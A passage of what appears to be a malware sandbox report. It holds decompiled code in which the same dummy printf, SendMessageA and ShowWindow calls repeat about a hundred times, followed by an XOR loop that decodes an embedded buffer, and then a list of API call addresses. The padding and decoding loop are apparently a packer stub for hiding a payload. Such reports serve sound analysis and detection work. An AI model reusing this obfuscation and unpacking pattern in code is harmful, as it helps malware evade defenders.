						printf("Result is:\nalpha=%f");
						_t1115 = _t1114 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1115 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1116 = _t1115 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1116 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1117 = _t1116 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1117 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1118 = _t1117 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1118 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1119 = _t1118 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1119 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1120 = _t1119 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1120 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1121 = _t1120 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1121 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1122 = _t1121 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1122 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1123 = _t1122 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1123 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1124 = _t1123 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1124 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1125 = _t1124 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1125 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1126 = _t1125 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1126 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1127 = _t1126 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1127 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1128 = _t1127 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1128 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1129 = _t1128 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1129 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1130 = _t1129 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1130 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1131 = _t1130 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1131 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1132 = _t1131 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1132 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1133 = _t1132 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1133 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1134 = _t1133 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1134 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1135 = _t1134 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1135 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1136 = _t1135 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1136 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1137 = _t1136 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1137 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1138 = _t1137 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1138 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1139 = _t1138 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1139 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1140 = _t1139 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1140 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1141 = _t1140 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1141 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1142 = _t1141 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1142 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1143 = _t1142 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1143 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1144 = _t1143 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1144 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1145 = _t1144 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1145 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1146 = _t1145 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1146 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1147 = _t1146 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1147 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1148 = _t1147 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1148 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1149 = _t1148 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1149 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1150 = _t1149 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1150 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1151 = _t1150 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1151 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1152 = _t1151 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1152 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1153 = _t1152 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1153 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1154 = _t1153 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1154 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1155 = _t1154 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1155 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1156 = _t1155 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1156 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1157 = _t1156 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1157 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1158 = _t1157 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1158 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1159 = _t1158 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1159 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1160 = _t1159 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1160 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1161 = _t1160 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1161 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1162 = _t1161 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1162 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1163 = _t1162 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1163 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1164 = _t1163 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1164 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1165 = _t1164 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1165 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1166 = _t1165 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1166 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1167 = _t1166 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1167 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1168 = _t1167 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1168 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1169 = _t1168 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1169 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1170 = _t1169 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1170 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1171 = _t1170 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1171 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1172 = _t1171 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1172 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1173 = _t1172 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1173 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1174 = _t1173 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1174 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1175 = _t1174 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1175 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1176 = _t1175 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1176 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1177 = _t1176 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1177 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1178 = _t1177 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1178 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1179 = _t1178 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1179 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1180 = _t1179 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1180 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1181 = _t1180 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1181 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1182 = _t1181 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1182 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1183 = _t1182 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1183 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1184 = _t1183 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1184 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1185 = _t1184 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1185 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1186 = _t1185 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1186 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1187 = _t1186 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1187 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1188 = _t1187 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1188 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1189 = _t1188 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1189 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1190 = _t1189 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1190 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1191 = _t1190 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1191 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1192 = _t1191 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1192 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1193 = _t1192 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1193 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1194 = _t1193 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1194 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1195 = _t1194 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1195 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1196 = _t1195 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1196 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1197 = _t1196 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1197 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1198 = _t1197 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1198 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1199 = _t1198 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1199 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1200 = _t1199 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1200 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1201 = _t1200 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1201 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1202 = _t1201 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1202 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1203 = _t1202 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1203 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1204 = _t1203 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1204 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1205 = _t1204 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1205 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1206 = _t1205 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1206 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1207 = _t1206 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1207 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1208 = _t1207 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1208 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1209 = _t1208 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1209 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1210 = _t1209 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1210 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1211 = _t1210 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1211 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1212 = _t1211 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1212 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1213 = _t1212 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1213 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1214 = _t1213 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1214 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t1215 = _t1214 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t1215 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t944 = _t1215 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						asm("cdq");
						_t902 =  *(_t944 + 0x20);
						 *_t902 =  *_t902 ^  *(_t944 + (( *(_t944 +  *(_t944 + 0x14) + 0x24) & 0x000000ff) + ( *(_t944 + 0x13) & 0x000000ff)) % 0x127aa + 0x24);
						_t63 = _t944 + 0x1c;
						 *_t63 =  *((intOrPtr*)(_t944 + 0x1c)) - 1;
						 *(_t944 + 0x20) =  &(_t902[0]);
						if( *_t63 == 0) {
							break;
						}
						_t78 =  *(_t944 + 0x14);
					}
					_t69 =  *(_t944 + 0x127dc);
				}
				return _t69;
			}

APIs

printf.MSVCRT ref: 00403736
SendMessageA.USER32 ref: 00403743
ShowWindow.USER32(00000000,00000000), ref: 00403747
printf.MSVCRT ref: 00403759
SendMessageA.USER32 ref: 00403766
ShowWindow.USER32(00000000,00000000), ref: 0040376A
printf.MSVCRT ref: 0040377C
SendMessageA.USER32 ref: 00403789
ShowWindow.USER32(00000000,00000000), ref: 0040378D
printf.MSVCRT ref: 0040379F
SendMessageA.USER32 ref: 004037AC
ShowWindow.USER32(00000000,00000000), ref: 004037B0
printf.MSVCRT ref: 004037C2
SendMessageA.USER32 ref: 004037CF
ShowWindow.USER32(00000000,00000000), ref: 004037D3
printf.MSVCRT ref: 004037E5
SendMessageA.USER32 ref: 004037F2
ShowWindow.USER32(00000000,00000000), ref: 004037F6
printf.MSVCRT ref: 00403808
SendMessageA.USER32 ref: 00403815
ShowWindow.USER32(00000000,00000000), ref: 00403819
printf.MSVCRT ref: 0040382B
SendMessageA.USER32 ref: 00403838
ShowWindow.USER32(00000000,00000000), ref: 0040383C
printf.MSVCRT ref: 0040384E
SendMessageA.USER32 ref: 0040385B
ShowWindow.USER32(00000000,00000000), ref: 0040385F
printf.MSVCRT ref: 00403871
SendMessageA.USER32 ref: 0040387E
ShowWindow.USER32(00000000,00000000), ref: 00403882
printf.MSVCRT ref: 00403894
SendMessageA.USER32 ref: 004038A1
ShowWindow.USER32(00000000,00000000), ref: 004038A5
printf.MSVCRT ref: 004038B7
SendMessageA.USER32 ref: 004038C4
ShowWindow.USER32(00000000,00000000), ref: 004038C8
printf.MSVCRT ref: 004038DA
SendMessageA.USER32 ref: 004038E7
ShowWindow.USER32(00000000,00000000), ref: 004038EB
printf.MSVCRT ref: 004038FD
SendMessageA.USER32 ref: 0040390A
ShowWindow.USER32(00000000,00000000), ref: 0040390E
printf.MSVCRT ref: 00403920
SendMessageA.USER32 ref: 0040392D
ShowWindow.USER32(00000000,00000000), ref: 00403931
printf.MSVCRT ref: 00403943
SendMessageA.USER32 ref: 00403950
ShowWindow.USER32(00000000,00000000), ref: 00403954
printf.MSVCRT ref: 00403966
SendMessageA.USER32 ref: 00403973
ShowWindow.USER32(00000000,00000000), ref: 00403977
printf.MSVCRT ref: 00403989
SendMessageA.USER32 ref: 00403996
ShowWindow.USER32(00000000,00000000), ref: 0040399A
printf.MSVCRT ref: 004039AC
SendMessageA.USER32 ref: 004039B9
ShowWindow.USER32(00000000,00000000), ref: 004039BD
printf.MSVCRT ref: 004039CF
SendMessageA.USER32 ref: 004039DC
ShowWindow.USER32(00000000,00000000), ref: 004039E0
printf.MSVCRT ref: 004039F2
SendMessageA.USER32 ref: 004039FF
ShowWindow.USER32(00000000,00000000), ref: 00403A03
printf.MSVCRT ref: 00403A15
SendMessageA.USER32 ref: 00403A22
ShowWindow.USER32(00000000,00000000), ref: 00403A26
printf.MSVCRT ref: 00403A38
SendMessageA.USER32 ref: 00403A45
ShowWindow.USER32(00000000,00000000), ref: 00403A49
printf.MSVCRT ref: 00403A5B
SendMessageA.USER32 ref: 00403A68
ShowWindow.USER32(00000000,00000000), ref: 00403A6C
printf.MSVCRT ref: 00403A7E
SendMessageA.USER32 ref: 00403A8B
ShowWindow.USER32(00000000,00000000), ref: 00403A8F
printf.MSVCRT ref: 00403AA1
SendMessageA.USER32 ref: 00403AAE
ShowWindow.USER32(00000000,00000000), ref: 00403AB2
printf.MSVCRT ref: 00403AC4
SendMessageA.USER32 ref: 00403AD1
ShowWindow.USER32(00000000,00000000), ref: 00403AD5
printf.MSVCRT ref: 00403AE7
SendMessageA.USER32 ref: 00403AF4
ShowWindow.USER32(00000000,00000000), ref: 00403AF8
printf.MSVCRT ref: 00403B0A
SendMessageA.USER32 ref: 00403B17
ShowWindow.USER32(00000000,00000000), ref: 00403B1B
printf.MSVCRT ref: 00403B2D
SendMessageA.USER32 ref: 00403B3A
ShowWindow.USER32(00000000,00000000), ref: 00403B3E
printf.MSVCRT ref: 00403B50
SendMessageA.USER32 ref: 00403B5D
ShowWindow.USER32(00000000,00000000), ref: 00403B61
printf.MSVCRT ref: 00403B73
SendMessageA.USER32 ref: 00403B80
ShowWindow.USER32(00000000,00000000), ref: 00403B84
printf.MSVCRT ref: 00403B96
SendMessageA.USER32 ref: 00403BA3
ShowWindow.USER32(00000000,00000000), ref: 00403BA7
printf.MSVCRT ref: 00403BB9
SendMessageA.USER32 ref: 00403BC6
ShowWindow.USER32(00000000,00000000), ref: 00403BCA
printf.MSVCRT ref: 00403BDC
SendMessageA.USER32 ref: 00403BE9
ShowWindow.USER32(00000000,00000000), ref: 00403BED
printf.MSVCRT ref: 00403BFF
SendMessageA.USER32 ref: 00403C0C
ShowWindow.USER32(00000000,00000000), ref: 00403C10
printf.MSVCRT ref: 00403C22
SendMessageA.USER32 ref: 00403C2F
ShowWindow.USER32(00000000,00000000), ref: 00403C33
printf.MSVCRT ref: 00403C45
SendMessageA.USER32 ref: 00403C52
ShowWindow.USER32(00000000,00000000), ref: 00403C56
printf.MSVCRT ref: 00403C68
SendMessageA.USER32 ref: 00403C75
ShowWindow.USER32(00000000,00000000), ref: 00403C79
printf.MSVCRT ref: 00403C8B
SendMessageA.USER32 ref: 00403C98
ShowWindow.USER32(00000000,00000000), ref: 00403C9C
printf.MSVCRT ref: 00403CAE
SendMessageA.USER32 ref: 00403CBB
ShowWindow.USER32(00000000,00000000), ref: 00403CBF
printf.MSVCRT ref: 00403CD1
SendMessageA.USER32 ref: 00403CDE
ShowWindow.USER32(00000000,00000000), ref: 00403CE2
printf.MSVCRT ref: 00403CF4
SendMessageA.USER32 ref: 00403D01
ShowWindow.USER32(00000000,00000000), ref: 00403D05
printf.MSVCRT ref: 00403D17
SendMessageA.USER32 ref: 00403D24
ShowWindow.USER32(00000000,00000000), ref: 00403D28
printf.MSVCRT ref: 00403D3A
SendMessageA.USER32 ref: 00403D47
ShowWindow.USER32(00000000,00000000), ref: 00403D4B
printf.MSVCRT ref: 00403D5D
SendMessageA.USER32 ref: 00403D6A
ShowWindow.USER32(00000000,00000000), ref: 00403D6E
printf.MSVCRT ref: 00403D80
SendMessageA.USER32 ref: 00403D8D
ShowWindow.USER32(00000000,00000000), ref: 00403D91
printf.MSVCRT ref: 00403DA3
SendMessageA.USER32 ref: 00403DB0
ShowWindow.USER32(00000000,00000000), ref: 00403DB4
printf.MSVCRT ref: 00403DC6
SendMessageA.USER32 ref: 00403DD3
ShowWindow.USER32(00000000,00000000), ref: 00403DD7
printf.MSVCRT ref: 00403DE9
SendMessageA.USER32 ref: 00403DF6
ShowWindow.USER32(00000000,00000000), ref: 00403DFA
printf.MSVCRT ref: 00403E0C
SendMessageA.USER32 ref: 00403E19
ShowWindow.USER32(00000000,00000000), ref: 00403E1D
printf.MSVCRT ref: 00403E2F
SendMessageA.USER32 ref: 00403E3C
ShowWindow.USER32(00000000,00000000), ref: 00403E40
printf.MSVCRT ref: 00403E52
SendMessageA.USER32 ref: 00403E5F
